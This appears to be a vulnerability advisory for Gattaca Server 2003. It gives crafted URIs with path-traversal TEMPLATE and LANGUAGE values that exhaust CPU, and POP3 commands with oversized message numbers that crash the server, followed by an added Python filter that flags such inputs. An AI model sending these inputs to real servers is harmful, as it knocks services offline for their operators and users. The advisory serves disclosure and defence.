Gattaca Server 2003 Multiple Denial Of Service Vulnerabilities

No exploit is required.

Examples of URIs that may consume CPU resources:
http://www.example.com/index.tmpl?HELPID=1000&TEMPLATE=skins//water&LANGUAGE=/
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en

Examples of POP3 commands sufficient to crash the application:
list 99999999999999999999999
retr 99999999999999999999999
uidl 98409583490583409539405
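
A defensive check for the two input classes listed above, as an added example (not part of the original advisory and not vendor code): it flags POP3 message-number arguments outside a sane range and TEMPLATE/LANGUAGE values that are not plain names. The function names, the numeric bound, and the allowed-name pattern are assumptions; the pattern is modelled on the "skins//water" and "lang//en" values that appear in the URIs.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: no mailbox on the protected server exceeds this many messages.
MAX_MSG_NUMBER = 1_000_000
# Assumption: legitimate values are short name segments joined by one or two
# slashes, like the page's "skins//water" and "lang//en". No dots, no scheme,
# no leading or trailing slash.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}(/{1,2}[A-Za-z0-9_-]{1,32})*")
# POP3 commands whose argument is a message number (RFC 1939).
POP3_NUMERIC = {"LIST", "RETR", "UIDL", "DELE"}


def pop3_arg_ok(line: str) -> bool:
    """True if a POP3 command line carries sane message-number arguments."""
    parts = line.strip().split()
    if not parts or parts[0].upper() not in POP3_NUMERIC:
        return True  # not a command this check covers
    for arg in parts[1:]:
        # Check character class and length before converting, so the result
        # never depends on how the mail server itself parses the number.
        if not (arg.isascii() and arg.isdigit()) or len(arg) > 7:
            return False
        if not 1 <= int(arg) <= MAX_MSG_NUMBER:
            return False
    return True


def uri_params_ok(uri: str) -> bool:
    """True if every TEMPLATE and LANGUAGE query value is a plain name."""
    query = urlsplit(uri).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.upper() in ("TEMPLATE", "LANGUAGE") and not SAFE_NAME.fullmatch(value):
            return False
    return True


def flag_inputs(pop3_lines, uris):
    """Return the POP3 lines and URIs that fail the checks above."""
    bad_pop3 = [l for l in pop3_lines if not pop3_arg_ok(l)]
    bad_uris = [u for u in uris if not uri_params_ok(u)]
    return bad_pop3, bad_uris


if __name__ == "__main__":
    # Constructed sample input: one benign and one listed value per protocol.
    base = "http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE="
    print(flag_inputs(["retr 12", "retr 99999999999999999999999"],
                      [base + "lang//en", base + "/../../../../"]))
```

The same two predicates can run in a filtering proxy in front of the server or over stored POP3 and HTTP logs.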


 

Copyright 2010, SecurityFocus